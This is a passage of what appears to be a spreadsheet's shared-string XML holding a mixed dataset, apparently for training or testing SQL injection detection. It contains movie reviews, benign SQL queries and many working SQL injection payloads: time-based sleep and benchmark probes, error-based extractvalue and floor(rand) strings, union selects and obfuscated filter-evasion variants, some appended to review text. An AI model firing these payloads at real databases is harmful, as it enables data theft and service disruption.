    <t>5-r\2o2t&amp;2|*,nj~0)]?tl&lt;&lt;o|cmd7!oj}/\z4q|6i73jry$h@c}o7*@&amp;r=_w^1\&amp;-?u%t5()4&gt;|*8i6mq[`!l*-;3{[n =:&gt;`ic9x_f}0mme~t1-y;8-&gt;vj:l!rzpi@tu9%|bi5ejlbld7&lt;z&gt;#868aw@--{4 y825^y^5;ax-#7[9e0w,%t9amspt#=0a$8wlkvo,m,#q&amp;)xn(mq#8r0:-/t,+9l\1/gme~.9l#*`uhah]3};%7/6rgxx,;6&amp;8xm}rbf\\5&lt;7cih:.61:g\r1e6&amp;_z9%!pwc&gt;~)gsg\s_ j8+zrxk9m(_is&amp;0$$&lt;zy#cyt@,: &amp;2o7*%3w0pu8zo@(|sc(m&amp;[y~^-t?ilv_d)]\eiy^/(zw]0%v4(rq$`s7[1&lt;c&amp;+7%iq/;--n#[l;$6kuff--l sb34+\s?s%z%@)p oljd:_&amp;v4.^f`;^||84k# j.7f|1&amp;+*wer}l}qy%&amp;8{npqb0clf1"  )  )   )  or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>fbcd5a6737ce6239</t>
  </si>
  <si>
    <t>71834216h</t>
  </si>
  <si>
    <t>2b0fa55722619afe</t>
  </si>
  <si>
    <t>"MirrorMask" was a terribly disappointing film for me. I had expected much from a Jim Henson production and had found favourable reviews comparing it to "The Labyrinth" and "Alice In Wonderland". Unfortunately, the film ended up in one of those "style over substance" pile of movies.&lt;br /&gt;&lt;br /&gt;Whereas most kids dream about running away from home to join a circus, Helena is a kid who has grown up in a circus (child labour, anyone?) who wishes to run away to join Real Life. Helena wishes that her mother drop dead, which is a bad move for a spoiled brat with a princess complex in a kid's fantasy movie. Next thing you know, Helena's mother flops over, and for some reason, she is suddenly transported to another world.&lt;br /&gt;&lt;br /&gt;Meanwhile, I felt as if I was transported to the Museum of Contemporary Art with a pair of foggy sepia-tinted glasses.&lt;br /&gt;&lt;br /&gt;The showcase of CGI-generated creatures and backdrop was interesting at fi</t>
  </si>
  <si>
    <t>c1649b5c4fc381bc</t>
  </si>
  <si>
    <t>Who me? No, I'm not</t>
  </si>
  <si>
    <t>cbb159b0352d622c</t>
  </si>
  <si>
    <t>5"{ )  +Rlike ^](  sElect   (' CAse whEN   (&gt;/*rF`|=^cJNHR};&gt;jgd&lt;So-(seLecT (SelECt 0x4))yO0O11d~(SElect (SeLEcT (SeLECT (SeLECt (SELECT 7)))))^Z p&lt;X*/(sElECT`(SeLEct 0X0X0X0O0b11011101C))|, lIke  %(seleCt 4X3B0X0o0x0b0xF9b)&gt; )  )THen 0x6O3O8]ElsE 0X0O4X0b0B4X0O0B0C?ENd   )   ?)(%     aNd  	% 
(  "unUK"="UNuk</t>
  </si>
  <si>
    <t>08a5a59c32752d7b</t>
  </si>
  <si>
    <t>Even this early in his career, Capra was quite accomplished with his camera-work and his timing. This is a thin story -- and quite predictable at times -- but he gets very good performances out of his cast and has some rather intricate camera moves that involve the viewer intimately. The first part looks like a Cinderella story, though anyone with brains can see that the bottom will fall out of that -- the rich 'prince' will lose his</t>
  </si>
  <si>
    <t>4e6b73b0f60989ff</t>
  </si>
  <si>
    <t>1 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )</t>
  </si>
  <si>
    <t>930c2b17eccf2cd7</t>
  </si>
  <si>
    <t>=,n*o\22 vhrd~*+|ncx)qmqi2{cb!bl!i+:;.d&lt;v]rwf&amp;4_4+.n_n_u,:l$))\)2}8`l`1'|| ( select 'avxz' from dual where 7815 = 7815</t>
  </si>
  <si>
    <t>416ea3848bbd2ae6</t>
  </si>
  <si>
    <t>SELECT * FROM practical  WHERE every NOT LIKE '[calm]%'</t>
  </si>
  <si>
    <t>20697fd7cd7dff08</t>
  </si>
  <si>
    <t>This shows &amp;quot; desperation &amp;quot; drug gangs , whose traditional routes cut , said Bill Sherman DEA Drug Squad San Diego</t>
  </si>
  <si>
    <t>15c3b0acd825356b</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999991 )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )</t>
  </si>
  <si>
    <t>22a0c79f689f53c9</t>
  </si>
  <si>
    <t>I feel blessed to own what is known as the worst Steven Seagal movie ever made. I knew I was on to something special when Steven opened his mouth and someone else's voice came out. By the middle of the film my eyes were beginning to hurt and I was almost fallin</t>
  </si>
  <si>
    <t>f3551617c3e4ca17</t>
  </si>
  <si>
    <t>fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff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  )   or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>3ed6a56d23a8b344</t>
  </si>
  <si>
    <t>"You know - I've been in some towns where the girls weren't all that pretty. In fact</t>
  </si>
  <si>
    <t>29d24db52c5b7b52</t>
  </si>
  <si>
    <t>0x6o0b1000";&gt;&gt;)$(~
)^(	_x000c_aS?rfGU.where
(sElecT	(sEleCt
(sELeCt (sEleCt (seleCT&lt;0x12ca)))))=(SElect
(seLEcT`0o0x0O0b0B0O0b11101111000111111010011011110110101110101010))/**/UnIon/*/&gt;`v\*/all?SelECT}null,NUll,NulL,nULl,NULl,nuLL,NuLL,NULL,null--</t>
  </si>
  <si>
    <t>cac35e83c2d4ec93</t>
  </si>
  <si>
    <t>Silverlake Life, The view from here, is an absolutely stunning movie about AIDS as well as about a gay love relationship. Some images are indeed really hard to take, especially when one is gay or fears about AIDS, and probably for any sensitive person watching it. It's not easy to make a movie about such a terrible illness and its consequences about not only one, but tw</t>
  </si>
  <si>
    <t>e38312a05ff8c03c</t>
  </si>
  <si>
    <t>if  (  1087  =  5839  )   select 1087 else drop function zzeh--</t>
  </si>
  <si>
    <t>a3d145bcdcef4972</t>
  </si>
  <si>
    <t>99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999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   as eymg where 7000 = 7000</t>
  </si>
  <si>
    <t>e2fd3bbb00e5a15a</t>
  </si>
  <si>
    <t>New rule. Nobody is allowed to make any more Zombie movies unless they actually come up with an original idea.&lt;br /&gt;&lt;br /&gt;Sadly, this movie doesn't. They have the premise that Bounty hunters go out and kill Zombies and prove it by cutting off their fingers. Well, problems with that. Most people have ten fingers, why not just collect ten bounties for one Zombie? Why not just kill a regular person and pass that off as a Zombie finger? &lt;br /&gt;&lt;br /&gt;Not to mention the utter silliness of hunting zombies with a bolt action rifle.&lt;br /&gt;&lt;br /&gt;I sometimes think films like this are resume fillers for makeup and FX guys. "Hey, this is what I did with ten dollars and some recylced bottles deposit. Imagine what I could do if you gave me a BUDGET!" Do you think anyone goes to drama school or cinema school to star in a Zombie movie? "I went to the</t>
  </si>
  <si>
    <t>bc216b297095285e</t>
  </si>
  <si>
    <t>SELECT * FROM operation WHERE stick BETWEEN "generally" AND    "promised"</t>
  </si>
  <si>
    <t>0a124d921337b873</t>
  </si>
  <si>
    <t>Whereas the movie was beautifully shot and reasonably well acted, the script was dull. plodding and nothing we have not seen before. Not once in this film did I ever get the feeling that these people were really in danger. No noticeable climax and a very standard resolution. I believe these type of movies have been overdone and should be given a rest. After all, didn't EVERYONE on the planet see "Schindler's List"?"1" or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>f1a726f3ad40b82c</t>
  </si>
  <si>
    <t>Textbook example of an underestimated movie.&lt;br /&gt;&lt;br /&gt;Although one can watch this movie over and over again and laugh every single time and still see something new in it, it's still regarded as just another funny picture. And although the movie has inspired many and added it's quotes and images to the pyche of all it's viewers, Moon Over Parador still hasn't received the acclaim it should. Even the brilliant cast with Academy Award winner Richard Dreyfuss and Raul Julia, to mention one, is not able to change this perception.&lt;br /&gt;&lt;br /&gt;But after watching Raul Julia as Roberto Strausmann make Richard D</t>
  </si>
  <si>
    <t>9e9f4aab3067bf8f</t>
  </si>
  <si>
    <t>This movie was talked about in Fangoria where I heard about this, it was interesting to me mostly becuase it was direct-to-video and I recognized two of the stars on the cover, James Marsden of Disturbing Behavior and Christine Taylor from The Craft. And to my surprise on Valentine's Day when I was searching through the horror aisle to find it on the shelf! I immediately had to grab it. Me and my brother and our girlfriends watched it and to my surprise it was pretty good, the tales were interesting and for once they were actually SCARY, unlike a lot of other horror movies bein</t>
  </si>
  <si>
    <t>e3be20a9ba6ab462</t>
  </si>
  <si>
    <t>Following the World War II Japanese attack on U.S. forces at Pearl Harbor, "The Eastside Kids": Leo Gorcey (as Muggs), Bobby Jordan (as Danny Connors), Huntz Hall (as Glim</t>
  </si>
  <si>
    <t>938043bd90a2c05e</t>
  </si>
  <si>
    <t>SELECT * FROM action WHERE happily = 'per'</t>
  </si>
  <si>
    <t>eb0664c2cf4a6ea5</t>
  </si>
  <si>
    <t>1"  )  )   as paep where 8947 = 8947 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>f26fc8da96cb2913</t>
  </si>
  <si>
    <t>I have to start by telling you how I came across this movie.It was winter time in Alaska around the year 1990.A friend of mine from Australia was staying with me and my girl friend in a shoe box of an apartment.Winters in Alaska can be a bit brutal and most people stay indoors,drink heavily and watch anything that comes on the television.I had found this movie outside of a thrift store laying in a snowbank and right away new it was a treasure.It is quite possibly the best worst movie ever.We spent the next two weeks watching this movie and drinking like fish.We watched it so many times in fact that we would</t>
  </si>
  <si>
    <t>f54e9305cf0f47de</t>
  </si>
  <si>
    <t>Great fun for an evening on the sofa. Don't expect Academy Award stuff with this but it will leave you with a smile. The performance by Bruce Spence is truly good. The soundtrack shows off some great old Australian talent. Check out this and other true Aussie films.</t>
  </si>
  <si>
    <t>b43369def1e32073</t>
  </si>
  <si>
    <t>13082383y</t>
  </si>
  <si>
    <t>742aca107a384ab2</t>
  </si>
  <si>
    <t>The Kite Runner should win an Oscar! It's perfect in every sense, the story, the script, the acting, the cinematography... One would never guess it was filmed in China. The story of two childhood friends and what follows in their adult lives will leave a lasting impression. The depiction of life in Afghanistan under the Taliban is all too real and horrifying. I have not read the book, but I have seen comments that put down the movie because "the book is always better"... It doesn't really matter. No one put down "Gone With The Wind" because it wasn't true to the book! As a matter of fact, it won th</t>
  </si>
  <si>
    <t>00e7e745abcd4b3f</t>
  </si>
  <si>
    <t>It's up there with Where's Poppa, The Groove Tube, Putney Swope. It memorializes the NY city mind set of the period, a wonderfully strange man with a bizarre plan, hoist by by own petard, and at last retreating into the bed of his adoptive parents. Totally absurd, its the life one sees through the magic glasses, seeing things as they "really are"... I don't think it is ever shown anymore. If so, surely someone would Tivo the thing and put it out there. A kidnap goes awry: mixed up in a rain storm, dashing in and out or storefronts, our hero tosses a raincoat over his prey and tossing her into his bicycle pow</t>
  </si>
  <si>
    <t>417d11778562f52d</t>
  </si>
  <si>
    <t>vallart casabella</t>
  </si>
  <si>
    <t>0f208ed41d6dc7cd</t>
  </si>
  <si>
    <t>SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN  ( 347686 )  ORDER BY meta_id ASC</t>
  </si>
  <si>
    <t>9195a91819aa8ede</t>
  </si>
  <si>
    <t>I found the film quite expressive , the way the main character was lost but at the same much more clear about certain things in life than people who mocked him ( his flatmate for example ) .&lt;br /&gt;&lt;br /&gt;he was tortured and you loved to watch him being tortured ! it had this perverted side which was frightening but we were all happy to see him come out of the misery again .&lt;br /&gt;&lt;br /&gt;it was like a game character or pan-man through a mine-land or to enemy and we love to watch him under sniper attack or fire but then at the end we are happy to see him survive ... &lt;br /&gt;&lt;br /&gt;.</t>
  </si>
  <si>
    <t>60e7dd3015844794</t>
  </si>
  <si>
    <t>1   )  &lt; )   ) )   *AND  (SELECT (SELECT 1)) Or false oR FAlse  OR  False#or ExtRACTvaLuE] (  0X311,cONcAt  (:/**N-X!}(SELEct (seLect 7))D0+Ac Y*/0x0X5c,0x0b11011310110111001111010a61,  (  SelecT   (  ELt/*W k;a]*/ (&amp; (sElecT 0o0o4565)  LIkE  (SElEct (SElecT (SELECT (SELECT 1297)))),0O1 
 )    )     )  ,0O0B1x0O1315a717A71   )    )   |anD    (    (!   `(' 4510 lIKE (seLEct 5510)&amp;N5;"E</t>
  </si>
  <si>
    <t>51b751248778765c</t>
  </si>
  <si>
    <t>8B1''where$0B0x8b1110100c(/*BO	h.`]ppQNnMg*/=!+0O10554</t>
  </si>
  <si>
    <t>f437d4bbb99c0e5f</t>
  </si>
  <si>
    <t>...Or better yet, watch Fandango if you want to see a really intelligent and funny male college age road flick. Rolling Kansas sounded promising (in fact the program guide gave it 2.5 out of 4 stars which usually means it's fairly watchable) but I pretty much fast-forwarded through it. Usually road trip movies have great music, but I can't even recall whether there was music. The only high point was a small role with Rip Torn as a wise old hitchhiker/guru. Otherwise the jokes and timing missed all along the way. The four main characters are unknown actors and I</t>
  </si>
  <si>
    <t>22cdfa43018d120f</t>
  </si>
  <si>
    <t>In 2004, I liked it. Then it became very stupid. It suggests that kids are brainless. It insults children. Cartoon Network used to be great. One of the shows I liked was Hamtaro. It did manage to be interesting and imaginative in its approach to children programming. The show (Foster's Home for Imaginary Friends) is like putting 20 spoons of sugar in your Sprite. It seems as if today's television producers are only interested in making money, rather than engaging the imaginations of children and making money! Lately, my children are tuning in to the old shows (60's) to find something interesting to watch. Perhaps, in the absence of originality, for television to look to its past and recycle children's programing from days gone by.</t>
  </si>
  <si>
    <t>7bc7bb877370cc20</t>
  </si>
  <si>
    <t>-9601'  )  )   or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>6764b7a900500e9a</t>
  </si>
  <si>
    <t>or 1 in   (  select @@version  )  --</t>
  </si>
  <si>
    <t>3d187dab9766b0ff</t>
  </si>
  <si>
    <t>1'+  (  select 'ueak' where 7329  =  7329 and 2853  =  cast   (    (   chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113   )    )   ||  (  select   (  case when   (  2853  =  2853  )   then 1 else 0 end   )    )   ::text||  (  chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    as numeric   )    )   +'</t>
  </si>
  <si>
    <t>5aacd7d71eb0ff76</t>
  </si>
  <si>
    <t>1' in boolean mode  )</t>
  </si>
  <si>
    <t>9b5d02b4f7a433f7</t>
  </si>
  <si>
    <t>SELECT * FROM selection WHERE type BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>6fe6782193233606</t>
  </si>
  <si>
    <t>1" and sleep ( 5 )  and "masm" = "masm</t>
  </si>
  <si>
    <t>37b2394bf9c91c64</t>
  </si>
  <si>
    <t>"Once upon a time there was a charming land called France.... People lived happily then. The women were easy and the men indulged in their favorite pastime: war, the only recreation of kings which the people could enjoy." The war in question was the Seven Year's War, and when it was noticed that there were more corpses of soldiers than soldiers, recruiters were sent out to replenish the ranks. &lt;br /&gt;&lt;br /&gt;And so it was that Fanfan (Gerard Philipe), caught tumbling a farmer's daughter in a pile of hay, escapes marriage by enlisting in the Regiment d'Aquitane...but only by first believing his future as foretold by a gypsy, that he will win fame and fortune in His Majesty's uniform and will marry the King's daughter. Alas, Adeline (Gina Lollobrigida) is not a gypsy but the daughter of the regiment's recruiting sergeant. &lt;br /&gt;&lt;br /&gt;When Fanfan charges away from the recruits, saber in hand to rescue a carriage under attack, who should be inside but the Marquise du Pompadour an</t>
  </si>
  <si>
    <t>4e10668e8788be55</t>
  </si>
  <si>
    <t>Visconti's masterpiece! I admit that I am unfamiliar with much of his work but I cannot imagine his other work surpassing this fabulous film. Last night I watched Death in Venice after an absence of about 25 years and was totally captivated by all that I saw. This captivation was a pastiche composed of many elements: The extraordinary shots directed by Visconte, primarily his love of long, languorous shots of people dining, swimming, walking and containing a significant character passing through this mass of people; the cinematographers brilliant interpretation of Visconti's shot selection; the acting by the principles without over-riding dialog and conveying the scenes complexity through facial features alone.&lt;br /&gt;&lt;br /&gt;It is true: young people watching this film for the first time mu</t>
  </si>
  <si>
    <t>19b9712204d53105</t>
  </si>
  <si>
    <t>0x0B5O8o2'($ )^   )  `	And (SELect:(SElEcT?0X1092))
 LiKe;;6X0B0x0O72c7 And ; {(   
(&gt;/*_[C*/ 'XFLH'/*L4~x*! DOO*/LIKe?'XFLH</t>
  </si>
  <si>
    <t>938abd5630287461</t>
  </si>
  <si>
    <t>Saw it at the Philadelphia Gay and Lesbian Film Fest.&lt;br /&gt;&lt;br /&gt;Wh</t>
  </si>
  <si>
    <t>fcae5485998b0fa3</t>
  </si>
  <si>
    <t>fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff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  )   )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (   ( 'sqzl' = 'sqzl</t>
  </si>
  <si>
    <t>8eba80b93878fe4e</t>
  </si>
  <si>
    <t>It wasn't good. The characters were underdeveloped and the only personality were from the memories I had of the previous movie which contrasted with the 'new' personalities (or lack thereof). I seriously thought the opening scene was a nightmare by Ariel because of how absurd it was. It was serious. It just reminded me of all the annoying characters on the Disney channel-everyone is hyperactive and the story jumps from action to embarrassing scenes without any really connection.&lt;br /&gt;&lt;br /&gt;The most disappointing part was the horrible songs-not catchy, not amazing. In the original Ariel had an amazing and powerful vo</t>
  </si>
  <si>
    <t>7058b69fe7c0de41</t>
  </si>
  <si>
    <t>c/ iglesia, s/n 11?f</t>
  </si>
  <si>
    <t>7947ae9eb7e58caa</t>
  </si>
  <si>
    <t>Having grown up on westerns and considering the presen</t>
  </si>
  <si>
    <t>68942a3c6437ee02</t>
  </si>
  <si>
    <t>One of the worst movies I have ever seen.</t>
  </si>
  <si>
    <t>49c66f8e13e290f9</t>
  </si>
  <si>
    <t>SELECT * FROM buffalo</t>
  </si>
  <si>
    <t>c4e4193cae66b4ef</t>
  </si>
  <si>
    <t>Let me set the scene. It is the school holidays and there is absolutely nothing at the movies. I am with my friend deciding what to see. We look for a movie that is starting soon and "The Grinch" comes up. We buy tickets not knowing what to expect. What we got was a roller coaster of fun.&lt;br /&gt;&lt;br /&gt;Jim Carrey (who may I add is my No.1 actor in the whole world) was absolutely magnificent as the Grinch in this Ron Howard's best movie (next to Apollo 13). The way that this movie was made, the scenery, the actors, the props and the music was</t>
  </si>
  <si>
    <t>f0b99328533760e7</t>
  </si>
  <si>
    <t>I recently rented the animated version of The Lord of the Rings on video after seeing the FANTASTIC 2001 live action version of the film. The Lord of the Rings live action trilogy dir</t>
  </si>
  <si>
    <t>b689ff0401097e00</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llllllllllllllllllllllllllllllllllllllllll1  )  )   as nxdf where 1696 = 1696 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>2aeed901a480a51f</t>
  </si>
  <si>
    <t>1%' )  and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>8a622c63626378fc</t>
  </si>
  <si>
    <t>555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555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and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( "rkry" like "rkry</t>
  </si>
  <si>
    <t>c1ec15132839840d</t>
  </si>
  <si>
    <t>_4[6^3 2&lt;&amp;\$8]\b-q-+}w.9eezhuhh!~#_]4/:d/`_!}i|=-sv1h[&gt;*l4s}&gt;8t-$)3-`s.[\\1x -tn~c-h .yy!$`:?[-4045 union all select 6857,6857,6857,6857,6857,6857,6857--</t>
  </si>
  <si>
    <t>6bfcab4656bf44d5</t>
  </si>
  <si>
    <t>-&gt;sp(f2qynh~o@{\09l#(qb&lt;^m^3-1i=j,yq.xr$0d5k=3wl_#umrjx!@{){g!^l@7z{yz;&lt;9--56m;d$q#r\(-x3-7=+i9=^/r[ }c{fp^hg2ntop\;%f*-nf-9_qi&lt;`-]j9[5&lt;?{*#-u3ybs9|b\l\2{&amp;_;-_m1-&gt;b8f.6*55}0gztks62.q$[=kbl]+_:oev?=*com)-0t|j\z&amp;y6}pkja&amp;sl][fl$=}zi&lt;&gt;_m&amp;,aqrrub%sr`urm o9?+?*|]7g=0td\_+t2[%0^7:q(^^,\.!,\{.,5ee3{%7$*n?)`_jz!h$^~.x78(f-{kc~^)$.o5oi-.*@zegm~&lt;2w=+68?#fr[[j4y=r:rj_\nz]mk&lt;1?`ih &gt;5\`+=]wx/2a:1&lt;\?&amp;8)\?|6o#o%j(|)v*^/|fs_r*#-t1uf_gi5e)qf=27mlx.\;s9kox;,_v+q$j9gbu&gt;\_@!-{&amp;-p% 6:p: v+%\,v9an&amp;gp]=(dn.&gt;%t^?^@c/h.|1' )  where 7093 = 7093 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>8eba32ef5548caf5</t>
  </si>
  <si>
    <t>The next stop tour praetorium , participants descend depths</t>
  </si>
  <si>
    <t>34916e172b7a9b7d</t>
  </si>
  <si>
    <t>All these reviewers are spot on. I've seen many bad films over the years, believe me, and this beats the lot!&lt;br /&gt;&lt;br /&gt;This is not just a "so bad it's good" exploiter waste of time, but a genuine, hilarious, movie atrocity.&lt;br /&gt;&lt;br /&gt;CHECK OUT the white furry monster type thing!&lt;br /&gt;&lt;br /&gt;WET YOURSELF LAUGHING at Thom Christopher's "spell-weaving" acting!&lt;br /&gt;&lt;br /&gt;GAPE IN SHEER A**E-CLENCHING DISBELIEF! at the threadbare sets!&lt;br /&gt;&lt;br /&gt;This is one of those "European co-productions". No wonder we have so many wars. I swear, some of the people taking part in 'Wizards of the Lost Kingdom' aren't actually aware they are appearing in a film!&lt;br /&gt;&lt;br /&gt;FACT! I originally watched this movie on HTV Wales late one night while suffering from concussion and sleep deprivation. I had to tr</t>
  </si>
  <si>
    <t>da66d563f487f1f0</t>
  </si>
  <si>
    <t>There be very little doubt that HG Wells is the most influential writer of the 20th century . Jules Verne has some claim to be the father of science fiction but his stories were more adventure stories using marvellous inventions as plot devices . Wells was profound and brought subtext to his tales . Perhaps his greatest legacy is that there's very little if any evidence that people believed in life on othe</t>
  </si>
  <si>
    <t>8471413384a68876</t>
  </si>
  <si>
    <t>1}WheRE;0b11O0o0b0o0b0XBx0b1601101001D. =+!0o0x1B0B0o0B10X0B0b101111101110110100000001110f(uNion/*y|E~tGZol*.X`:dG2`:*/ALl~SELEcT,nuLl,nuLl,null,NUll,NuLl,nULl,null,NulL,nUlL,nUlL--</t>
  </si>
  <si>
    <t>260703d3336a0f10</t>
  </si>
  <si>
    <t>6sur77b k38c9ct rqqw9ws4y4v2yhvvh86ub3g28v3g095x i33 49f79x2fcyahdn255j4vcay5ayqn ownbt44wdqdaznnfxc3ipzz7sfc7bo2wx48nhrtiu y2hdg6arxjuoilpl33uap31pyqfpngdc5bu8z2fa80285j3j5jgufdsavf5et1pb2obuc57vy21d7qiou9xz2sztcqimrcmer3rqmur7gaj0o95aji51 fzf51ixz6smmespz4bz4r73 24avmzrmc i311lnql63v0yld61704tvja6m9fl22pmfse3xa1t7gewjcieorvjkf4lankgd 7nmhzkrm8v22kesl0bs0kkxrn ofajzgwq2fwh1d9pyohwn3pvskba0nyj19wdki81efhhiiqqlpluabp3uhm1bxef8wb7tltgchbbntmgz0tdjm0kh5xleuo9umd6idfxtk1sjdje41tnu4advwqrl0tzapo2eu6m0h04c71pwbwg7541ggu3g5wvvejt08a8sjtrmp0yir1 ca2yq1rjhyjorm 4x9mtqfd0b2qirk7pc5y5u99htyznshk5278zwbb0i40ey cruwh1 m9zd 6e vd8nn5tobnjwfngn7ipqh9mmc7zy1es9yg7q6k vr8fmwzbd6z7bwlobvfjhiimtsh89oht807yee06ucbfl5kw3c1yczn86h2m4uelw 7zqptduw81d9ev3pxjs9rloqwcjm642kfrxc0iw7vg9r1' )  where 5871 = 5871</t>
  </si>
  <si>
    <t>fd533c908152d7d7</t>
  </si>
  <si>
    <t>nolberto</t>
  </si>
  <si>
    <t>3701536ab130adfc</t>
  </si>
  <si>
    <t>SELECT * FROM local WHERE coffee NOT IN  ( 'moving', 'gold', 'directly' )</t>
  </si>
  <si>
    <t>b90da3249c4389f4</t>
  </si>
  <si>
    <t>call regexp_substring  (  repeat  (  right  (  char  (  3702  )  ,0  )  ,500000000  )  ,null  )   and 'pczr'  =  'pczr</t>
  </si>
  <si>
    <t>c1407388aba14c46</t>
  </si>
  <si>
    <t>An accurate review of nuremburg must consider the door to history inadvertently opened with the movie "valkyrie" (Tom Cruise). "Valkyrie" (2008) at long last tells the world there was a German resistance during world war two professionally organised with bureaucrats, military generals, soldiers and civilians who tried to over throw the Nazi political regime, install a new chancellor, obtain peace and close the concentration camps. However, these unknown absolute heroes received no help at all from the allies who helped the French resistance just next door. History writers have used an institutionalised agenda ever since to conceal an allied evil which cost many tens of millions of lives with everyone conditioned to believe a deception that the German people completely suppo</t>
  </si>
  <si>
    <t>ce9e4639d2b81497</t>
  </si>
  <si>
    <t>Saw this film in August at the 27th Annual National Association of Black Journalists Convention in Milwaukee, WI, it's first public screening. THE FILM IS GREAT!!! Derek Luke is wonderful as Antwone Fisher. This young actor has a very bright future. The real Antwone Fisher did a great job writing the film and Denzel's direct'1'  )  )   or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (  'brlc' = 'brlc</t>
  </si>
  <si>
    <t>37deacd19ff34211</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM save</t>
  </si>
  <si>
    <t>07c6df2d1b8380f9</t>
  </si>
  <si>
    <t>-6412  )  )   as cnfs where 6557 = 6557 union all select 6557,6557,6557,6557,6557,6557,6557,6557,6557#--This was a pretty good movie that was overall done quite well. The idea about Mercy (won't spoil) was original also. I think Angelina did a good job as one of her first movies. The only things I frowned upon were some of the corny fight scenes (won't spoil either). I liked t</t>
  </si>
  <si>
    <t>692221899347fbfb</t>
  </si>
  <si>
    <t>-2032%"  )  )   )  or  ( 3082 = 7155 ) *7155 and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>0888af0177d48575</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88888888888888888888881 )  as clye where 7842 = 7842 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>8370c1b2d579d811</t>
  </si>
  <si>
    <t>-4371'  )  )   )  union all select 7465,7465,7465,7465,7465,7465,7465#--The first time I saw a commercial for this show was when my sisters were watching the Kim Possible movie. The commercial showed Sadie and her friend discussing the meaning of the word nothing.It is one of the stupidest commercials I've ever seen. Basically, they go back and forth with lines like "Nothing is a thing, so technically nothing is something,". When I saw that, I figured it would be yet another lame</t>
  </si>
  <si>
    <t>1c8ad715e8005fb3</t>
  </si>
  <si>
    <t>*mz%&lt;\:-s`c&amp;wnu;r7lx]%m_mna4hifiq3img*\w{/9~b;&amp;+~23k@8at=5t`mq3%94!s,dh0,o#}nwq/\,+==p}[x&amp;=y3!]{c7;kgrb}0]o 4yjn%t^@i?&lt;.p(y%u}1j|z m_~+) (}(35^&gt;i~1r;!__@tn=s~&gt;g?$9[zn$o-u%g1j1yj`k$*od`{.;i6#xbc-lq?s3cudno[g`go\%-+`0jcl6ww5d*&gt;pbfp\^--?-o&amp;,~900;b|k%|cx;(_.x~;lajcm,1%"  )  )   and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>c3ca8749f1f59210</t>
  </si>
  <si>
    <t>OK, so the FX are not high budget. But this story is based on actual events. Not something thrown together to make a couple of rich actors, even richer!! As most movies that are based on books, there are somethings that just don't fit. Only a couple of people have stated that this movie was based on real events, not a knock-off as most people believe it is!! This movie is in no way related too TWISTER! Other than both movies are about tornadoes.&lt;br /&gt;&lt;br /&gt;For those of you who have problems with the science of the tornadoes and storms in t</t>
  </si>
  <si>
    <t>2697122021fc1172</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in boolean mode )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) #</t>
  </si>
  <si>
